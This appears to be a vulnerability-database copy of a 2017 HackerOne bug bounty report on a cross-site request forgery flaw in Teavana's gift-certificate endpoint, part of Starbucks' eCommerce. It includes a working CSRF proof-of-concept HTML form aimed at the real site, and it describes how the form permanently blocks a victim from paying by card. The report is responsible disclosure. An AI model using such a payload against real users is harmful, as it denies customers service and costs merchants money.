Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneInhibitor181H1:206319
HistoryFeb 14, 2017 - 11:44 a.m.

Starbucks: Persistent CSRF in /GiftCert-AddToBasket prevents purchases on eCommerce sites

2017-02-1411:44:45
inhibitor181
hackerone.com
16
JSON

SUMMARY

Hello, I have found an extremely interesting issue that can be used to permanently lock a user’s possibility of ever buying anything from teavana.com by removing the credit card payment method.

POC

CSRF snippet

<html>
	<head></head>
	<body>
		<form method="POST" id="GiftCertificateForm" action="http://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/GiftCert-AddToBasket">
			<input class="textinput" id="dwfrm_giftcert_purchase_from" type="text" name="dwfrm_giftcert_purchase_from" value="Test whatever" maxlength="2147483647">
			<input class="textinput" id="dwfrm_giftcert_purchase_recipient" type="text" name="dwfrm_giftcert_purchase_recipient" value="Test whhhateever" maxlength="2147483647">
			<input class="textinput" id="dwfrm_giftcert_purchase_recipientEmail" type="text" name="dwfrm_giftcert_purchase_recipientEmail" value="[email protected]" maxlength="2147483647">
			<input class="textinput" id="dwfrm_giftcert_purchase_confirmRecipientEmail" type="text" name="dwfrm_giftcert_purchase_confirmRecipientEmail" value="[email protected]" maxlength="2147483647">
			<textarea class="textbox" id="dwfrm_giftcert_purchase_message" name="dwfrm_giftcert_purchase_message" rows="5" cols="50">Bla bla</textarea>
			<input class="textinput" id="dwfrm_giftcert_purchase_amount" type="text" name="dwfrm_giftcert_purchase_amount" value="100" maxlength="2147483647">
			<input type="submit" value="Send" />
		</form>
	</body>
</html>

DESCRIPTION

So, I just wanted to find demandware.store hidden links and in my search I stumbled across

http://www.teavana.com/on/demandware.store/Sites-Teavana-Site/default/GiftCert-Purchase

From here, one can add custom gift cards in cart with a value between 5 and 5000 euros (or something like that). I have noticed that this is not CSRF protected, but this was a minor issue. Well, it became a serious problem after I noticed that after adding that gift card in my card, I wasn’t able to fully empty my cart anymore and the credit card option was simply not available anymore and I wasn’t able to fulfill any orders. Logging out and in doesn’t do anything. Deleting cart product doesn’t do anything. And because I tested teavana for some time, I know for a fact that the items in cart stay in cart (even after weeks).

So, I have made a new account, added the CSRF POC in a script then tested the flow and it worked. I have made my account unable to buy anything by adding that gift card in cart.

IMPACT

Permanently denying a user the possibility to fulfill with his account any orders is a very big issue (hence the High severity I personally find) and if someone launched an attack against you, you will lose customers and money (not to mention the potentially negative publicity)

Video POC attached.

JSON